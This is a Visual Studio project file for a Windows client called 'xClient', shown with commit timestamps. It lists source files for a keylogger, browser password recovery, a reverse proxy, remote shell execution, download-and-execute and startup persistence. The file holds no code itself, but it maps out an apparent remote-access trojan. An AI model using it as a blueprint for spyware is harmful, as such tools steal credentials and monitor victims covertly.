2014-07-08 12:58:53 +00:00
|
|
|
|
<?xml version="1.0" encoding="utf-8"?>
|
|
|
|
|
<Project ToolsVersion="4.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
|
|
|
|
<PropertyGroup>
|
|
|
|
|
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
|
|
|
|
|
<Platform Condition=" '$(Platform)' == '' ">x86</Platform>
|
|
|
|
|
<ProductVersion>8.0.30703</ProductVersion>
|
|
|
|
|
<SchemaVersion>2.0</SchemaVersion>
|
|
|
|
|
<ProjectGuid>{9F5CF56A-DDB2-4F40-AB99-2A1DC47588E1}</ProjectGuid>
|
|
|
|
|
<OutputType>WinExe</OutputType>
|
|
|
|
|
<AppDesignerFolder>Properties</AppDesignerFolder>
|
2015-01-13 18:29:11 +00:00
|
|
|
|
<RootNamespace>xClient</RootNamespace>
|
2014-07-08 12:58:53 +00:00
|
|
|
|
<AssemblyName>Client</AssemblyName>
|
2015-05-22 19:09:54 +00:00
|
|
|
|
<TargetFrameworkVersion>v3.5</TargetFrameworkVersion>
|
2014-07-08 12:58:53 +00:00
|
|
|
|
<FileAlignment>512</FileAlignment>
|
2015-05-22 19:09:54 +00:00
|
|
|
|
<TargetFrameworkProfile>Client</TargetFrameworkProfile>
|
2014-07-08 12:58:53 +00:00
|
|
|
|
</PropertyGroup>
|
|
|
|
|
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|x86' ">
|
|
|
|
|
<PlatformTarget>AnyCPU</PlatformTarget>
|
|
|
|
|
<DebugSymbols>true</DebugSymbols>
|
|
|
|
|
<DebugType>full</DebugType>
|
|
|
|
|
<Optimize>false</Optimize>
|
|
|
|
|
<OutputPath>..\Bin\Debug\</OutputPath>
|
|
|
|
|
<DefineConstants>DEBUG;TRACE</DefineConstants>
|
|
|
|
|
<ErrorReport>prompt</ErrorReport>
|
|
|
|
|
<WarningLevel>4</WarningLevel>
|
|
|
|
|
<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
|
|
|
|
|
</PropertyGroup>
|
|
|
|
|
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|x86' ">
|
|
|
|
|
<PlatformTarget>AnyCPU</PlatformTarget>
|
|
|
|
|
<DebugType>pdbonly</DebugType>
|
|
|
|
|
<Optimize>true</Optimize>
|
|
|
|
|
<OutputPath>..\Bin\Release\</OutputPath>
|
|
|
|
|
<DefineConstants>TRACE</DefineConstants>
|
|
|
|
|
<ErrorReport>prompt</ErrorReport>
|
|
|
|
|
<WarningLevel>4</WarningLevel>
|
|
|
|
|
<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
|
|
|
|
|
</PropertyGroup>
|
2015-01-13 18:29:11 +00:00
|
|
|
|
<PropertyGroup>
|
|
|
|
|
<StartupObject>xClient.Program</StartupObject>
|
|
|
|
|
</PropertyGroup>
|
2014-07-08 12:58:53 +00:00
|
|
|
|
<ItemGroup>
|
2015-05-27 14:27:57 +00:00
|
|
|
|
<Reference Include="Microsoft.VisualBasic" />
|
2014-07-08 12:58:53 +00:00
|
|
|
|
<Reference Include="System" />
|
|
|
|
|
<Reference Include="System.Drawing" />
|
|
|
|
|
<Reference Include="System.Management" />
|
2015-05-27 14:27:57 +00:00
|
|
|
|
<Reference Include="System.Runtime.Serialization" />
|
|
|
|
|
<Reference Include="System.Security" />
|
|
|
|
|
<Reference Include="System.ServiceModel.Web" />
|
2014-07-08 12:58:53 +00:00
|
|
|
|
<Reference Include="System.Windows.Forms" />
|
|
|
|
|
<Reference Include="System.Xml" />
|
|
|
|
|
</ItemGroup>
|
|
|
|
|
<ItemGroup>
|
2015-07-25 22:10:59 +00:00
|
|
|
|
<Compile Include="Core\Helper\FileHelper.cs" />
|
|
|
|
|
<Compile Include="Core\Helper\FormatHelper.cs" />
|
2015-08-03 15:33:50 +00:00
|
|
|
|
<Compile Include="Core\Helper\HostHelper.cs" />
|
2015-07-25 22:10:59 +00:00
|
|
|
|
<Compile Include="Core\Helper\NativeMethodsHelper.cs" />
|
|
|
|
|
<Compile Include="Core\Helper\PlatformHelper.cs" />
|
2015-07-26 14:44:03 +00:00
|
|
|
|
<Compile Include="Core\Helper\ScreenHelper.cs" />
|
2015-08-08 14:21:09 +00:00
|
|
|
|
<Compile Include="Core\NetSerializer\CodeGenContext.cs" />
|
|
|
|
|
<Compile Include="Core\NetSerializer\Helpers.cs" />
|
|
|
|
|
<Compile Include="Core\NetSerializer\ITypeSerializer.cs" />
|
|
|
|
|
<Compile Include="Core\NetSerializer\Primitives.cs" />
|
|
|
|
|
<Compile Include="Core\NetSerializer\Serializer.cs" />
|
|
|
|
|
<Compile Include="Core\NetSerializer\TypeSerializers\ArraySerializer.cs" />
|
|
|
|
|
<Compile Include="Core\NetSerializer\TypeSerializers\DictionarySerializer.cs" />
|
|
|
|
|
<Compile Include="Core\NetSerializer\TypeSerializers\EnumSerializer.cs" />
|
|
|
|
|
<Compile Include="Core\NetSerializer\TypeSerializers\GenericSerializer.cs" />
|
|
|
|
|
<Compile Include="Core\NetSerializer\TypeSerializers\ObjectSerializer.cs" />
|
|
|
|
|
<Compile Include="Core\NetSerializer\TypeSerializers\PrimitivesSerializer.cs" />
|
2015-06-05 21:07:37 +00:00
|
|
|
|
<Compile Include="Core\Networking\Client.cs" />
|
2014-07-08 12:58:53 +00:00
|
|
|
|
<Compile Include="Core\Commands\CommandHandler.cs" />
|
2015-05-16 01:42:05 +00:00
|
|
|
|
<Compile Include="Core\Commands\ConnectionHandler.cs" />
|
|
|
|
|
<Compile Include="Core\Commands\FileHandler.cs" />
|
|
|
|
|
<Compile Include="Core\Commands\MiscHandler.cs" />
|
|
|
|
|
<Compile Include="Core\Commands\SurveillanceHandler.cs" />
|
|
|
|
|
<Compile Include="Core\Commands\SystemHandler.cs" />
|
2015-03-31 14:35:42 +00:00
|
|
|
|
<Compile Include="Core\Compression\SafeQuickLZ.cs" />
|
2014-07-08 12:58:53 +00:00
|
|
|
|
<Compile Include="Core\Encryption\AES.cs" />
|
2015-03-20 13:45:58 +00:00
|
|
|
|
<Compile Include="Core\Encryption\SHA256.cs" />
|
2015-06-02 17:14:32 +00:00
|
|
|
|
<Compile Include="Core\Extensions\RegistryKeyExtensions.cs" />
|
2015-08-02 18:04:58 +00:00
|
|
|
|
<Compile Include="Core\Packets\ClientPackets\GetPasswordsResponse.cs" />
|
2015-08-06 17:58:36 +00:00
|
|
|
|
<Compile Include="Core\Packets\ClientPackets\SetStatusFileManager.cs" />
|
2015-07-29 13:11:07 +00:00
|
|
|
|
<Compile Include="Core\Packets\ServerPackets\DoKeyboardEvent.cs" />
|
2015-08-02 18:04:58 +00:00
|
|
|
|
<Compile Include="Core\Packets\ServerPackets\GetPasswords.cs" />
|
2015-07-25 22:10:59 +00:00
|
|
|
|
<Compile Include="Core\Utilities\FileSplit.cs" />
|
2015-08-15 14:06:07 +00:00
|
|
|
|
<Compile Include="Core\Data\Host.cs" />
|
2015-08-03 15:33:50 +00:00
|
|
|
|
<Compile Include="Core\Utilities\HostsManager.cs" />
|
2015-07-25 22:10:59 +00:00
|
|
|
|
<Compile Include="Core\Utilities\NativeMethods.cs" />
|
|
|
|
|
<Compile Include="Core\Utilities\UnsafeStreamCodec.cs" />
|
2015-04-14 18:42:48 +00:00
|
|
|
|
<Compile Include="Core\Compression\JpgCompression.cs" />
|
2015-04-06 18:33:34 +00:00
|
|
|
|
<Compile Include="Core\Extensions\SocketExtensions.cs" />
|
2015-07-26 17:36:11 +00:00
|
|
|
|
<Compile Include="Core\MouseKeyHook\Hook.cs" />
|
|
|
|
|
<Compile Include="Core\MouseKeyHook\HotKeys\HotKeyArgs.cs" />
|
|
|
|
|
<Compile Include="Core\MouseKeyHook\HotKeys\HotKeySet.cs" />
|
|
|
|
|
<Compile Include="Core\MouseKeyHook\HotKeys\HotKeySetCollection.cs" />
|
|
|
|
|
<Compile Include="Core\MouseKeyHook\HotKeys\HotKeySetsListener.cs" />
|
|
|
|
|
<Compile Include="Core\MouseKeyHook\IKeyboardEvents.cs" />
|
|
|
|
|
<Compile Include="Core\MouseKeyHook\IKeyboardMouseEvents.cs" />
|
|
|
|
|
<Compile Include="Core\MouseKeyHook\IMouseEvents.cs" />
|
|
|
|
|
<Compile Include="Core\MouseKeyHook\Implementation\AppEventFacade.cs" />
|
|
|
|
|
<Compile Include="Core\MouseKeyHook\Implementation\AppKeyListener.cs" />
|
|
|
|
|
<Compile Include="Core\MouseKeyHook\Implementation\AppMouseListener.cs" />
|
|
|
|
|
<Compile Include="Core\MouseKeyHook\Implementation\BaseListener.cs" />
|
|
|
|
|
<Compile Include="Core\MouseKeyHook\Implementation\ButtonSet.cs" />
|
|
|
|
|
<Compile Include="Core\MouseKeyHook\Implementation\Callback.cs" />
|
|
|
|
|
<Compile Include="Core\MouseKeyHook\Implementation\EventFacade.cs" />
|
|
|
|
|
<Compile Include="Core\MouseKeyHook\Implementation\GlobalEventFacade.cs" />
|
|
|
|
|
<Compile Include="Core\MouseKeyHook\Implementation\GlobalKeyListener.cs" />
|
|
|
|
|
<Compile Include="Core\MouseKeyHook\Implementation\GlobalMouseListener.cs" />
|
|
|
|
|
<Compile Include="Core\MouseKeyHook\Implementation\KeyboardState.cs" />
|
|
|
|
|
<Compile Include="Core\MouseKeyHook\Implementation\KeyListener.cs" />
|
|
|
|
|
<Compile Include="Core\MouseKeyHook\Implementation\MouseListener.cs" />
|
|
|
|
|
<Compile Include="Core\MouseKeyHook\Implementation\Subscribe.cs" />
|
|
|
|
|
<Compile Include="Core\MouseKeyHook\KeyEventArgsExt.cs" />
|
|
|
|
|
<Compile Include="Core\MouseKeyHook\KeyPressEventArgsExt.cs" />
|
|
|
|
|
<Compile Include="Core\Helper\KeyloggerHelper.cs" />
|
|
|
|
|
<Compile Include="Core\MouseKeyHook\MouseEventExtArgs.cs" />
|
|
|
|
|
<Compile Include="Core\MouseKeyHook\WinApi\AppMouseStruct.cs" />
|
|
|
|
|
<Compile Include="Core\MouseKeyHook\WinApi\CallbackData.cs" />
|
|
|
|
|
<Compile Include="Core\MouseKeyHook\WinApi\HookHelper.cs" />
|
|
|
|
|
<Compile Include="Core\MouseKeyHook\WinApi\HookIds.cs" />
|
|
|
|
|
<Compile Include="Core\MouseKeyHook\WinApi\HookNativeMethods.cs" />
|
|
|
|
|
<Compile Include="Core\MouseKeyHook\WinApi\HookProcedure.cs" />
|
|
|
|
|
<Compile Include="Core\MouseKeyHook\WinApi\HookProcedureHandle.cs" />
|
|
|
|
|
<Compile Include="Core\MouseKeyHook\WinApi\HookResult.cs" />
|
|
|
|
|
<Compile Include="Core\MouseKeyHook\WinApi\KeyboardHookStruct.cs" />
|
|
|
|
|
<Compile Include="Core\MouseKeyHook\WinApi\KeyboardNativeMethods.cs" />
|
|
|
|
|
<Compile Include="Core\MouseKeyHook\WinApi\Messages.cs" />
|
|
|
|
|
<Compile Include="Core\MouseKeyHook\WinApi\MouseNativeMethods.cs" />
|
|
|
|
|
<Compile Include="Core\MouseKeyHook\WinApi\MouseStruct.cs" />
|
|
|
|
|
<Compile Include="Core\MouseKeyHook\WinApi\Point.cs" />
|
|
|
|
|
<Compile Include="Core\MouseKeyHook\WinApi\ThreadNativeMethods.cs" />
|
2015-07-14 17:00:31 +00:00
|
|
|
|
<Compile Include="Core\Packets\ClientPackets\GetDesktopResponse.cs" />
|
|
|
|
|
<Compile Include="Core\Packets\ClientPackets\GetDirectoryResponse.cs" />
|
|
|
|
|
<Compile Include="Core\Packets\ClientPackets\DoDownloadFileResponse.cs" />
|
|
|
|
|
<Compile Include="Core\Packets\ClientPackets\GetDrivesResponse.cs" />
|
|
|
|
|
<Compile Include="Core\Packets\ClientPackets\GetKeyloggerLogsResponse.cs" />
|
2015-01-13 18:29:11 +00:00
|
|
|
|
<Compile Include="Core\Packets\ClientPackets\GetProcessesResponse.cs" />
|
2015-02-24 11:13:04 +00:00
|
|
|
|
<Compile Include="Core\Packets\ClientPackets\GetStartupItemsResponse.cs" />
|
2015-01-13 18:29:11 +00:00
|
|
|
|
<Compile Include="Core\Packets\ClientPackets\GetSystemInfoResponse.cs" />
|
2015-07-14 17:00:31 +00:00
|
|
|
|
<Compile Include="Core\Packets\ClientPackets\GetMonitorsResponse.cs" />
|
|
|
|
|
<Compile Include="Core\Packets\ClientPackets\DoShellExecuteResponse.cs" />
|
|
|
|
|
<Compile Include="Core\Packets\ClientPackets\SetUserStatus.cs" />
|
2015-05-28 22:25:40 +00:00
|
|
|
|
<Compile Include="Core\Packets\PacketHandler.cs" />
|
2015-07-14 17:00:31 +00:00
|
|
|
|
<Compile Include="Core\Packets\ServerPackets\DoShutdownAction.cs" />
|
|
|
|
|
<Compile Include="Core\Packets\ServerPackets\DoStartupItemAdd.cs" />
|
2015-07-24 13:46:11 +00:00
|
|
|
|
<Compile Include="Core\Packets\ServerPackets\DoUploadFile.cs" />
|
2015-07-14 17:00:31 +00:00
|
|
|
|
<Compile Include="Core\Packets\ServerPackets\GetDesktop.cs" />
|
|
|
|
|
<Compile Include="Core\Packets\ServerPackets\GetDirectory.cs" />
|
|
|
|
|
<Compile Include="Core\Packets\ServerPackets\DoPathDelete.cs" />
|
|
|
|
|
<Compile Include="Core\Packets\ServerPackets\DoPathRename.cs" />
|
|
|
|
|
<Compile Include="Core\Packets\ServerPackets\DoDownloadFile.cs" />
|
|
|
|
|
<Compile Include="Core\Packets\ServerPackets\DoDownloadFileCancel.cs" />
|
|
|
|
|
<Compile Include="Core\Packets\ServerPackets\GetDrives.cs" />
|
|
|
|
|
<Compile Include="Core\Packets\ServerPackets\GetKeyloggerLogs.cs" />
|
2015-02-24 11:13:04 +00:00
|
|
|
|
<Compile Include="Core\Packets\ServerPackets\GetStartupItems.cs" />
|
2015-01-13 18:29:11 +00:00
|
|
|
|
<Compile Include="Core\Packets\ServerPackets\GetSystemInfo.cs" />
|
2015-07-14 17:00:31 +00:00
|
|
|
|
<Compile Include="Core\Packets\ServerPackets\DoProcessKill.cs" />
|
|
|
|
|
<Compile Include="Core\Packets\ServerPackets\GetMonitors.cs" />
|
|
|
|
|
<Compile Include="Core\Packets\ServerPackets\DoStartupItemRemove.cs" />
|
|
|
|
|
<Compile Include="Core\Packets\ServerPackets\DoShellExecute.cs" />
|
|
|
|
|
<Compile Include="Core\Packets\ServerPackets\DoShowMessageBox.cs" />
|
|
|
|
|
<Compile Include="Core\Packets\ServerPackets\DoClientUpdate.cs" />
|
|
|
|
|
<Compile Include="Core\Packets\ServerPackets\DoUploadAndExecute.cs" />
|
|
|
|
|
<Compile Include="Core\Packets\ServerPackets\DoVisitWebsite.cs" />
|
2015-07-27 13:57:05 +00:00
|
|
|
|
<Compile Include="Core\Packets\ServerPackets\DoMouseEvent.cs" />
|
2015-07-14 17:00:31 +00:00
|
|
|
|
<Compile Include="Core\Packets\ServerPackets\DoProcessStart.cs" />
|
2015-08-02 18:04:58 +00:00
|
|
|
|
<Compile Include="Core\Packets\ServerPackets\GetProcesses.cs" />
|
2015-07-26 14:44:03 +00:00
|
|
|
|
<Compile Include="Core\Utilities\Shell.cs" />
|
2015-08-02 18:50:38 +00:00
|
|
|
|
<Compile Include="Core\Recovery\Browsers\Chrome.cs" />
|
|
|
|
|
<Compile Include="Core\Recovery\Browsers\Firefox.cs" />
|
|
|
|
|
<Compile Include="Core\Recovery\Utilities\Chromium.cs" />
|
|
|
|
|
<Compile Include="Core\Recovery\Utilities\JsonUtil.cs" />
|
2015-08-15 14:06:07 +00:00
|
|
|
|
<Compile Include="Core\Data\RecoveredAccount.cs" />
|
2015-08-02 18:50:38 +00:00
|
|
|
|
<Compile Include="Core\Recovery\Utilities\SQLiteHandler.cs" />
|
|
|
|
|
<Compile Include="Core\Recovery\Browsers\InternetExplorer.cs" />
|
|
|
|
|
<Compile Include="Core\Recovery\Browsers\Opera.cs" />
|
|
|
|
|
<Compile Include="Core\Recovery\Browsers\Yandex.cs" />
|
2015-05-10 17:02:10 +00:00
|
|
|
|
<Compile Include="Core\ReverseProxy\Packets\ReverseProxyConnect.cs" />
|
|
|
|
|
<Compile Include="Core\ReverseProxy\Packets\ReverseProxyConnectResponse.cs" />
|
|
|
|
|
<Compile Include="Core\ReverseProxy\Packets\ReverseProxyData.cs" />
|
|
|
|
|
<Compile Include="Core\ReverseProxy\Packets\ReverseProxyDisconnect.cs" />
|
2015-05-10 11:11:27 +00:00
|
|
|
|
<Compile Include="Core\ReverseProxy\ReverseProxyClient.cs" />
|
|
|
|
|
<Compile Include="Core\ReverseProxy\ReverseProxyCommandHandler.cs" />
|
2014-07-08 12:58:53 +00:00
|
|
|
|
<Compile Include="Core\SystemCore.cs" />
|
2015-07-14 17:00:31 +00:00
|
|
|
|
<Compile Include="Core\Packets\ClientPackets\SetStatus.cs" />
|
|
|
|
|
<Compile Include="Core\Packets\ClientPackets\GetAuthenticationResponse.cs" />
|
2014-07-08 12:58:53 +00:00
|
|
|
|
<Compile Include="Core\Packets\IPacket.cs" />
|
2015-07-14 17:00:31 +00:00
|
|
|
|
<Compile Include="Core\Packets\ServerPackets\DoClientDisconnect.cs" />
|
|
|
|
|
<Compile Include="Core\Packets\ServerPackets\DoDownloadAndExecute.cs" />
|
|
|
|
|
<Compile Include="Core\Packets\ServerPackets\DoClientUninstall.cs" />
|
|
|
|
|
<Compile Include="Core\Packets\ServerPackets\GetAuthentication.cs" />
|
|
|
|
|
<Compile Include="Core\Packets\ServerPackets\DoClientReconnect.cs" />
|
2015-07-26 14:44:03 +00:00
|
|
|
|
<Compile Include="Core\Helper\GeoLocationHelper.cs" />
|
2015-07-26 17:36:11 +00:00
|
|
|
|
<Compile Include="Core\Utilities\Keylogger.cs" />
|
2015-07-27 15:36:18 +00:00
|
|
|
|
<Compile Include="Enums\MouseAction.cs" />
|
2015-07-25 22:10:59 +00:00
|
|
|
|
<Compile Include="Enums\PathType.cs" />
|
|
|
|
|
<Compile Include="Enums\ShutdownAction.cs" />
|
|
|
|
|
<Compile Include="Enums\UserStatus.cs" />
|
2014-07-08 12:58:53 +00:00
|
|
|
|
<Compile Include="Program.cs" />
|
|
|
|
|
<Compile Include="Properties\AssemblyInfo.cs" />
|
|
|
|
|
<Compile Include="Config\Settings.cs" />
|
|
|
|
|
<EmbeddedResource Include="Properties\Resources.resx">
|
|
|
|
|
<Generator>ResXFileCodeGenerator</Generator>
|
|
|
|
|
<LastGenOutput>Resources.Designer.cs</LastGenOutput>
|
|
|
|
|
<SubType>Designer</SubType>
|
|
|
|
|
</EmbeddedResource>
|
|
|
|
|
<Compile Include="Properties\Resources.Designer.cs">
|
|
|
|
|
<AutoGen>True</AutoGen>
|
|
|
|
|
<DependentUpon>Resources.resx</DependentUpon>
|
|
|
|
|
<DesignTime>True</DesignTime>
|
|
|
|
|
</Compile>
|
|
|
|
|
<None Include="Properties\Settings.settings">
|
|
|
|
|
<Generator>SettingsSingleFileGenerator</Generator>
|
|
|
|
|
<LastGenOutput>Settings.Designer.cs</LastGenOutput>
|
|
|
|
|
</None>
|
|
|
|
|
<Compile Include="Properties\Settings.Designer.cs">
|
|
|
|
|
<AutoGen>True</AutoGen>
|
|
|
|
|
<DependentUpon>Settings.settings</DependentUpon>
|
|
|
|
|
<DesignTimeSharedInput>True</DesignTimeSharedInput>
|
|
|
|
|
</Compile>
|
|
|
|
|
</ItemGroup>
|
2015-05-20 15:50:47 +00:00
|
|
|
|
<ItemGroup>
|
2015-07-26 17:36:11 +00:00
|
|
|
|
<Content Include="Core\MouseKeyHook\HotKeys\ReadMe.txt" />
|
2015-05-20 15:50:47 +00:00
|
|
|
|
</ItemGroup>
|
2015-05-27 11:30:35 +00:00
|
|
|
|
<ItemGroup />
|
2014-07-08 12:58:53 +00:00
|
|
|
|
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
|
|
|
|
|
<PropertyGroup>
|
|
|
|
|
<PostBuildEvent>copy "$(TargetPath)" "$(TargetDir)client.bin" /Y</PostBuildEvent>
|
|
|
|
|
</PropertyGroup>
|
|
|
|
|
<!-- To modify your build process, add your task inside one of the targets below and uncomment it.
|
|
|
|
|
Other similar extension points exist, see Microsoft.Common.targets.
|
|
|
|
|
<Target Name="BeforeBuild">
|
|
|
|
|
</Target>
|
|
|
|
|
<Target Name="AfterBuild">
|
|
|
|
|
</Target>
|
|
|
|
|
-->
|
|
|
|
|
</Project>
|